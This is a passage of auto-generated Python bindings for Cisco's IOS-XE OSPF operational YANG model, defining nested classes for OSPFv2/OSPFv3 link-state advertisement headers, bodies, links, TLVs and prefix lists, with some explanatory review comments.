OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: 
"lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None 
# NOTE(review): This file appears to be auto-generated YDK Python bindings for the
# Cisco-IOS-XE-ospf-oper YANG model (module prefix 'ospf-ios-xe-oper', revision
# 2018-02-01). Do not hand-edit; regenerate from the YANG model instead.
# Each nested Entity subclass mirrors one YANG container/list; `_leafs` maps
# Python attribute names to (YLeaf/YLeafList, accepted-types) pairs, `ylist_key_names`
# holds the YANG list keys, and `_segment_path` builds the instance's XPath segment.
# `self._is_frozen = True` at the end of each __init__ arms the `__setattr__` guard,
# which routes all later attribute writes through `_perform_setattr`.

                    # --- continuation of LinkData.__init__ (container 'link-data'; its `def` precedes this chunk) ---
                    self.lsa_id_options = Bits()
                    self._segment_path = lambda: "link-data"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)


            class IaPrefix(Entity):
                # YANG container 'ia-prefix' under 'lsa-body': OSPFv3 intra-area-prefix LSA reference fields (no list keys).
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'

                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()

                    self.yang_name = "ia-prefix"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                        ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
                        ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
                    ])
                    self.referenced_ls_type = None
                    self.referenced_link_state_id = None
                    self.referenced_adv_router = None
                    self.num_of_prefixes = None
                    self._segment_path = lambda: "ia-prefix"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)


        class Ospfv3Link(Entity):
            # YANG list 'ospfv3-link' under 'link-scope-lsa'
            # (keys: interface-id, neighbor-interface-id, neighbor-router-id).
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()

                self.yang_name = "ospfv3-link"
                self.yang_parent_name = "link-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
                    ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
                    ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
                    ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                    ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                ])
                self.interface_id = None
                self.neighbor_interface_id = None
                self.neighbor_router_id = None
                self.type = None
                self.metric = None
                # XPath segment embeds all three list-key values.
                self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)


        class Ospfv3PrefixList(Entity):
            # YANG list 'ospfv3-prefix-list' under 'link-scope-lsa' (key: prefix).
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()

                self.yang_name = "ospfv3-prefix-list"
                self.yang_parent_name = "link-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['prefix']
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                    ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                ])
                self.prefix = None
                self.prefix_options = None
                self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)


        class Ospfv3IaPrefix(Entity):
            # YANG list 'ospfv3-ia-prefix' under 'link-scope-lsa' (key: prefix).
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()

                self.yang_name = "ospfv3-ia-prefix"
                self.yang_parent_name = "link-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['prefix']
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                    ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                ])
                self.prefix = None
                self.prefix_options = None
                self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)


        class MultiTopology(Entity):
            # YANG list 'multi-topology' under 'link-scope-lsa' (key: name).
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()

                self.yang_name = "multi-topology"
                self.yang_parent_name = "link-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['name']
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('name', (YLeaf(YType.str, 'name'), ['str'])),
                ])
                self.name = None
                self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)


        class Tlv(Entity):
            # YANG container 'tlv' under 'link-scope-lsa': traffic-engineering link TLV
            # fields (bandwidth leafs carry Decimal64 string values; no list keys).
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()

                self.yang_name = "tlv"
                self.yang_parent_name = "link-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
                    ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                    ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
                    ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
                    ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
                    ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
                    ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
                    ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
                    ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
                ])
                self.link_type = None
                self.link_id = None
                # leaf-lists start as empty Python lists
                self.local_if_ipv4_addr = []
                self.local_remote_ipv4_addr = []
                self.te_metric = None
                self.max_bandwidth = None
                self.max_reservable_bandwidth = None
                self.unreserved_bandwidth = None
                self.admin_group = None
                self._segment_path = lambda: "tlv"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)


        class UnknownSubTlv(Entity):
            # YANG list 'unknown-sub-tlv' under 'link-scope-lsa' (key: type);
            # 'value' is a uint8 leaf-list holding the raw sub-TLV bytes.
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()

                self.yang_name = "unknown-sub-tlv"
                self.yang_parent_name = "link-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['type']
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                    ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                    ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
                ])
                self.type = None
                self.length = None
                self.value = []
                self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)


    class AreaScopeLsa(Entity):
        # YANG list 'area-scope-lsa' under 'link-scope-lsas'
        # (keys: lsa-type, adv-router). Holds one decoded LSA plus its raw bytes;
        # the nested classes below model the OSPFv2/OSPFv3 decodings.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, self).__init__()

            self.yang_name = "area-scope-lsa"
            self.yang_parent_name = "link-scope-lsas"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['lsa_type','adv_router']
            self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
            self._leafs = OrderedDict([
                ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
                ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
                ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
                ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
            ])
            self.lsa_type = None
            self.adv_router = None
            self.decoded_completed = None
            self.raw_data = []

            # singleton child containers
            self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
            self.ospfv2_lsa.parent = self
            self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"

            self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
            self.ospfv3_lsa.parent = self
            self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"

            # child YANG lists
            self.ospfv2_link = YList(self)
            self.ospfv2_topology = YList(self)
            self.ospfv2_external = YList(self)
            self.ospfv3_link = YList(self)
            self.ospfv3_prefix = YList(self)
            self.ospfv3_ia_prefix = YList(self)
            self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)


        class Ospfv2Lsa(Entity):
            # YANG container 'ospfv2-lsa': decoded OSPFv2 LSA (header + lsa-body).
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()

                self.yang_name = "ospfv2-lsa"
                self.yang_parent_name = "area-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
                self._leafs = OrderedDict()

                self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
                self.header.parent = self
                self._children_name_map["header"] = "header"

                self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
                self.lsa_body.parent = self
                self._children_name_map["lsa_body"] = "lsa-body"
                self._segment_path = lambda: "ospfv2-lsa"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)


            class Header(Entity):
                # YANG container 'header': OSPFv2 LSA header fields (age, type,
                # adv-router, seq-num, checksum, length, option bits).
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'

                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()

                    self.yang_name = "header"
                    self.yang_parent_name = "ospfv2-lsa"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                        ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                        ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                        ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                        ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                        ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                        ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                        ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                        ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                        ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
                    ])
                    self.lsa_id = None
                    self.opaque_type = None
                    self.opaque_id = None
                    self.age = None
                    self.type = None
                    self.adv_router = None
                    self.seq_num = None
                    self.checksum = None
                    self.length = None
                    self.flag_options = Bits()
                    self._segment_path = lambda: "header"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)


            class LsaBody(Entity):
                # YANG container 'lsa-body': OSPFv2 LSA body (masks, link count,
                # body flags) with nested 'network' container.
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'

                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()

                    self.yang_name = "lsa-body"
                    self.yang_parent_name = "ospfv2-lsa"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
                    self._leafs = OrderedDict([
                        ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                        ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                        ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                        ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
                    ])
                    self.num_of_links = None
                    self.summary_mask = None
                    self.external_mask = None
                    self.body_flag_options = Bits()

                    self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
                    self.network.parent = self
                    self._children_name_map["network"] = "network"
                    self._segment_path = lambda: "lsa-body"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)


                class Network(Entity):
                    # YANG container 'network': network-LSA mask and attached routers.
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'

                    def __init__(self):
                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()

                        self.yang_name = "network"
                        self.yang_parent_name = "lsa-body"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                        ])
                        self.network_mask = None
                        self.attached_router = []
                        self._segment_path = lambda: "network"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)


        class Ospfv2Link(Entity):
            # YANG list 'ospfv2-link' under 'area-scope-lsa'
            # (keys: link-id, link-data); contains per-topology metrics.
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()

                self.yang_name = "ospfv2-link"
                self.yang_parent_name = "area-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['link_id','link_data']
                self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
                self._leafs = OrderedDict([
                    ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                    ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
                    ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                ])
                self.link_id = None
                self.link_data = None
                self.type = None

                self.ospfv2_topology = YList(self)
                self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)


            class Ospfv2Topology(Entity):
                # YANG list 'ospfv2-topology' under 'ospfv2-link' (key: mt-id).
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'

                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()

                    self.yang_name = "ospfv2-topology"
                    self.yang_parent_name = "ospfv2-link"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = ['mt_id']
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                        ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                    ])
                    self.mt_id = None
                    self.metric = None
                    self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)


        class Ospfv2Topology(Entity):
            # YANG list 'ospfv2-topology' directly under 'area-scope-lsa' (key: mt-id).
            # Same leafs as Ospfv2Link.Ospfv2Topology but a different parent node.
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()

                self.yang_name = "ospfv2-topology"
                self.yang_parent_name = "area-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['mt_id']
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                    ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                ])
                self.mt_id = None
                self.metric = None
                self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)


        class Ospfv2External(Entity):
            # YANG list 'ospfv2-external' under 'area-scope-lsa' (key: mt-id):
            # external-LSA metric, forwarding address and route tag.
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()

                self.yang_name = "ospfv2-external"
                self.yang_parent_name = "area-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['mt_id']
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                    ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                    ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                    ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                ])
                self.mt_id = None
                self.metric = None
                self.forwarding_address = None
                self.external_route_tag = None
                self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)


        class Ospfv3Lsa(Entity):
            # YANG container 'ospfv3-lsa': decoded OSPFv3 LSA (header + lsa-body).
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()

                self.yang_name = "ospfv3-lsa"
                self.yang_parent_name = "area-scope-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
                self._leafs = OrderedDict()

                self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
                self.header.parent = self
                self._children_name_map["header"] = "header"

                self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
                self.lsa_body.parent = self
                self._children_name_map["lsa_body"] = "lsa-body"
                self._segment_path = lambda: "ospfv3-lsa"
                self._is_frozen = True

            def __setattr__(self, name, value):
